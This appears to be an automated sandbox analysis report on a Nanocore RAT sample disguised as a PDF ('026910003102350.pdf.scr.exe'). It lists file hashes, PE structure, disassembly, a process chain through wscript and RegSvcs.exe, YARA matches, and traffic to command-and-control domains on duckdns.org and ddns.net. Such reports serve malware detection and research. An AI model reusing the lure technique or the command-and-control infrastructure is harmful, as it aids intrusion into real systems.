                                                  Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):46
                                                  Entropy (8bit):4.3523814564716385
                                                  Encrypted:false
                                                  SSDEEP:3:oNUkh4E2J5xAIwGMNn:oN923fA
                                                  MD5:E01C7B4BFFC4D8966DFDD6831E4904F7
                                                  SHA1:FE638E970FB82742E2C4D7EA3AE7E043589304FB
                                                  SHA-256:ECFA3D73848685C232F4B352A5E24F4995B7D55FF4130A26B7BAEB3839280300
                                                  SHA-512:FD9C41391E076E66F9A65DF18CA790EF06518B8033A5D24BF631E6E7F5EACECF34AD2AA7197FEB8B8FC7ED571A3BEFA0C8C940631F6EE5C0F5996D703B6AC50A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Process:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):90
                                                  Entropy (8bit):4.969700668999775
                                                  Encrypted:false
                                                  SSDEEP:3:YRRvutvEOVBJcRAoovKXRGdY2JRMow7:AvCEOVHcoXzpi
                                                  MD5:B48D7F5C0CC7E6A4C737BE0D827B9867
                                                  SHA1:906E2605871B8F319FA2A455C06F2E53940ED777
                                                  SHA-256:B2BACD88BAFE8C668A45AB03A2D5647A9BDDA6CF1361FC821D5A70480B8CCB69
                                                  SHA-512:9E3F4634AF71BCD600576BBD09EBC569E8D5D286ACD07D8E516AD61A80D3447156AEACB59194F24D9C39A1BBE666E038375A94E4AA5A7821D971FD166A7DD694
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:[S3tt!ng]..stpth=%localappdata%\temp..Key=Chrome..Dir3ctory=Folder8_410..ExE_c=itugx.exe..
                                                  Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1141
                                                  Entropy (8bit):4.44831826838854
                                                  Encrypted:false
                                                  SSDEEP:24:zKLXkb4DObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0b4DQntKKH1MqJC
                                                  MD5:1AEB3A784552CFD2AEDEDC1D43A97A4F
                                                  SHA1:804286AB9F8B3DE053222826A69A7CDA3492411A
                                                  SHA-256:0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
                                                  SHA-512:5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.826498922764083
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:026910003102350.pdf.scr.exe
                                                  File size:1064658
                                                  MD5:c2a80ccf6362bba805072de9ce963ea5
                                                  SHA1:c7a0ca8b35e2c08e69f48d754dbdbf20f2d1d53f
                                                  SHA256:592217d2590ae9ca688346688b2d7d13a78190f9562889597ebb79060136034c
                                                  SHA512:377fbc8008b63f9380ebe0a90db28a191fd3f0eea97dd10e6f16607eb42c51f713cbfb744f2ce73b74093f4866a05e3b00ec7f8b57e2bff2c6a9c8f2118ce707
                                                  SSDEEP:24576:9TbBv5rUeTA/TYaxVKPijItG0bKL1xRMa2LSmnbrDrF:XBvIHBMG02L1N29rDx
                                                  TLSH:95351202BEC196B2D0A3093256767721B97DB9601F68CEDFA3D1466CAD325C0E7317B2
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                  Icon Hash:938c8c90b2ea6ab2
                                                  Entrypoint:0x41f530
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                  Instruction
                                                  call 00007FF9B4BF9B7Bh
                                                  jmp 00007FF9B4BF948Dh
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push ebp
                                                  mov ebp, esp
                                                  push esi
                                                  push dword ptr [ebp+08h]
                                                  mov esi, ecx
                                                  call 00007FF9B4BEC2D7h
                                                  mov dword ptr [esi], 004356D0h
                                                  mov eax, esi
                                                  pop esi
                                                  pop ebp
                                                  retn 0004h
                                                  and dword ptr [ecx+04h], 00000000h
                                                  mov eax, ecx
                                                  and dword ptr [ecx+08h], 00000000h
                                                  mov dword ptr [ecx+04h], 004356D8h
                                                  mov dword ptr [ecx], 004356D0h
                                                  ret
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push ebp
                                                  mov ebp, esp
                                                  push esi
                                                  mov esi, ecx
                                                  lea eax, dword ptr [esi+04h]
                                                  mov dword ptr [esi], 004356B8h
                                                  push eax
                                                  call 00007FF9B4BFC91Fh
                                                  test byte ptr [ebp+08h], 00000001h
                                                  pop ecx
                                                  je 00007FF9B4BF961Ch
                                                  push 0000000Ch
                                                  push esi
                                                  call 00007FF9B4BF8BD9h
                                                  pop ecx
                                                  pop ecx
                                                  mov eax, esi
                                                  pop esi
                                                  pop ebp
                                                  retn 0004h
                                                  push ebp
                                                  mov ebp, esp
                                                  sub esp, 0Ch
                                                  lea ecx, dword ptr [ebp-0Ch]
                                                  call 00007FF9B4BEC252h
                                                  push 0043BEF0h
                                                  lea eax, dword ptr [ebp-0Ch]
                                                  push eax
                                                  call 00007FF9B4BFC3D9h
                                                  int3
                                                  push ebp
                                                  mov ebp, esp
                                                  sub esp, 0Ch
                                                  lea ecx, dword ptr [ebp-0Ch]
                                                  call 00007FF9B4BF9598h
                                                  push 0043C0F4h
                                                  lea eax, dword ptr [ebp-0Ch]
                                                  push eax
                                                  call 00007FF9B4BFC3BCh
                                                  int3
                                                  jmp 00007FF9B4BFDE57h
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push 00422900h
                                                  push dword ptr fs:[00000000h]
                                                  Programming Language:
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0x4a8c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x69000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0x4a8c | 0x4c00 | False | 0.6105571546052632 | data | 6.391160230365552 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x69000 | 0x233c | 0x2400 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
PNG | 0x64524 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States
PNG | 0x6506c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States
RT_ICON | 0x66618 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | |
RT_DIALOG | 0x66740 | 0x286 | data | English | United States
RT_DIALOG | 0x669c8 | 0x13a | data | English | United States
RT_DIALOG | 0x66b04 | 0xec | data | English | United States
RT_DIALOG | 0x66bf0 | 0x12e | data | English | United States
RT_DIALOG | 0x66d20 | 0x338 | data | English | United States
RT_DIALOG | 0x67058 | 0x252 | data | English | United States
RT_STRING | 0x672ac | 0x1e2 | data | English | United States
RT_STRING | 0x67490 | 0x1cc | data | English | United States
RT_STRING | 0x6765c | 0x1b8 | data | English | United States
RT_STRING | 0x67814 | 0x146 | data | English | United States
RT_STRING | 0x6795c | 0x46c | data | English | United States
RT_STRING | 0x67dc8 | 0x166 | data | English | United States
RT_STRING | 0x67f30 | 0x152 | data | English | United States
RT_STRING | 0x68084 | 0x10a | data | English | United States
RT_STRING | 0x68190 | 0xbc | data | English | United States
RT_STRING | 0x6824c | 0xd6 | data | English | United States
RT_GROUP_ICON | 0x68324 | 0x14 | data | |
RT_MANIFEST | 0x68338 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 2, 2023 08:09:58.131228924 CET | 49700 | 60705 | 192.168.2.5 | 212.193.30.230
Feb 2, 2023 08:10:01.243844986 CET | 49700 | 60705 | 192.168.2.5 | 212.193.30.230
Feb 2, 2023 08:10:07.244303942 CET | 49700 | 60705 | 192.168.2.5 | 212.193.30.230
Feb 2, 2023 08:10:24.303241014 CET | 49705 | 60705 | 192.168.2.5 | 212.193.30.230
Feb 2, 2023 08:10:27.408564091 CET | 49705 | 60705 | 192.168.2.5 | 212.193.30.230
Feb 2, 2023 08:10:33.418741941 CET | 49705 | 60705 | 192.168.2.5 | 212.193.30.230
Feb 2, 2023 08:10:49.414972067 CET | 49707 | 60705 | 192.168.2.5 | 212.193.30.230
Feb 2, 2023 08:10:52.435837984 CET | 49707 | 60705 | 192.168.2.5 | 212.193.30.230
Feb 2, 2023 08:10:58.508714914 CET | 49707 | 60705 | 192.168.2.5 | 212.193.30.230
Feb 2, 2023 08:11:07.956806898 CET | 49709 | 60705 | 192.168.2.5 | 212.193.30.230
Feb 2, 2023 08:11:11.050592899 CET | 49709 | 60705 | 192.168.2.5 | 212.193.30.230
Feb 2, 2023 08:11:17.053057909 CET | 49709 | 60705 | 192.168.2.5 | 212.193.30.230
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 2, 2023 08:09:57.770723104 CET | 60841 | 53 | 192.168.2.5 | 8.8.8.8
Feb 2, 2023 08:09:57.877348900 CET | 53 | 60841 | 8.8.8.8 | 192.168.2.5
Feb 2, 2023 08:10:24.189878941 CET | 49724 | 53 | 192.168.2.5 | 8.8.8.8
Feb 2, 2023 08:10:24.299720049 CET | 53 | 49724 | 8.8.8.8 | 192.168.2.5
Feb 2, 2023 08:10:49.296843052 CET | 65323 | 53 | 192.168.2.5 | 8.8.8.8
Feb 2, 2023 08:10:49.405663013 CET | 53 | 65323 | 8.8.8.8 | 192.168.2.5
Feb 2, 2023 08:11:07.934437990 CET | 63446 | 53 | 192.168.2.5 | 8.8.8.8
Feb 2, 2023 08:11:07.953950882 CET | 53 | 63446 | 8.8.8.8 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 2, 2023 08:09:57.770723104 CET | 192.168.2.5 | 8.8.8.8 | 0x830a | Standard query (0) | december2n.duckdns.org | A (IP address) | IN (0x0001) | false
Feb 2, 2023 08:10:24.189878941 CET | 192.168.2.5 | 8.8.8.8 | 0x17be | Standard query (0) | december2n.duckdns.org | A (IP address) | IN (0x0001) | false
Feb 2, 2023 08:10:49.296843052 CET | 192.168.2.5 | 8.8.8.8 | 0x8dd7 | Standard query (0) | december2n.duckdns.org | A (IP address) | IN (0x0001) | false
Feb 2, 2023 08:11:07.934437990 CET | 192.168.2.5 | 8.8.8.8 | 0x1c9a | Standard query (0) | december2nd.ddns.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 2, 2023 08:09:57.877348900 CET | 8.8.8.8 | 192.168.2.5 | 0x830a | No error (0) | december2n.duckdns.org | | 212.193.30.230 | A (IP address) | IN (0x0001) | false
Feb 2, 2023 08:10:24.299720049 CET | 8.8.8.8 | 192.168.2.5 | 0x17be | No error (0) | december2n.duckdns.org | | 212.193.30.230 | A (IP address) | IN (0x0001) | false
Feb 2, 2023 08:10:49.405663013 CET | 8.8.8.8 | 192.168.2.5 | 0x8dd7 | No error (0) | december2n.duckdns.org | | 212.193.30.230 | A (IP address) | IN (0x0001) | false
Feb 2, 2023 08:11:07.953950882 CET | 8.8.8.8 | 192.168.2.5 | 0x1c9a | No error (0) | december2nd.ddns.net | | 212.193.30.230 | A (IP address) | IN (0x0001) | false

                                                  Target ID:0
                                                  Start time:08:09:32
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  Imagebase:0xcc0000
                                                  File size:1064658 bytes
                                                  MD5 hash:C2A80CCF6362BBA805072DE9CE963EA5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  Target ID:1
                                                  Start time:08:09:46
                                                  Start date:02/02/2023
                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
                                                  Imagebase:0x50000
                                                  File size:147456 bytes
                                                  MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000001.00000003.359286205.00000000036B5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  Reputation:high

                                                  Target ID:2
                                                  Start time:08:09:54
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls
                                                  Imagebase:0x310000
                                                  File size:936754 bytes
                                                  MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 46%, ReversingLabs
                                                  Reputation:low

                                                  Target ID:3
                                                  Start time:08:10:05
                                                  Start date:02/02/2023
                                                  Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  Imagebase:0xe80000
                                                  File size:45152 bytes
                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
